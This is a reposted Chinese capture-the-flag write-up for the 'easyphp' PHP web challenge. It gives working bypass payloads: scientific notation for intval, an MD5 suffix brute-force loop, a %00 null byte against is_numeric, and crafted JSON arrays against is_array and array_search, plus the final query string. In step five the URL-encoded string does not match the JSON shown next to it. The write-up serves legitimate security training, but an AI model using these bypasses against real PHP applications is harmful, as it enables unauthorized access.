返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >攻防世界ctf web easyphp题解wp
  • 601
分享到

攻防世界ctf web easyphp题解wp

php安全web安全 2023-09-17 06:09:13 601人浏览 独家记忆
摘要

第一步,用科学计数法绕过 a=1e9 if(isset($a) && intval($a) > 6000000 && strlen($a)

第一步,用科学计数法绕过 a=1e9

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)#$a=1e9

第二步,用PHP代码编写MD5碰撞脚本得到b=53724

for($i = 1;$i <= 100000;$i++){    if('8b184b' === substr(md5($i),-6,6)){        echo $i."
".md5($i); }}


第三步,绕过is_numeric函数

$c=(array)JSON_decode(@$_GET['c']); #接收json格式的字符串并将其转化为数组c={"m":"2033%00"}#使用%00可以绕过is_numeric函数


第四步,绕过is_array函数

c={"m":"2033%00","n":[[1]]}

 第五步,绕过array_search函数

c={"m":"2033%00","n":[[0,2],0]}#对{"m":"2033%00","n":[[0,2],0]}进行url编码得到:%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

一定要对传值url编码

?a=1e9&b=53724&c=%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

提交得到flag

 

来源地址:https://blog.csdn.net/qq_41169485/article/details/127097629

--结束END--

本文标题: 攻防世界ctf web easyphp题解wp

本文链接: https://lsjlt.com/news/410768.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作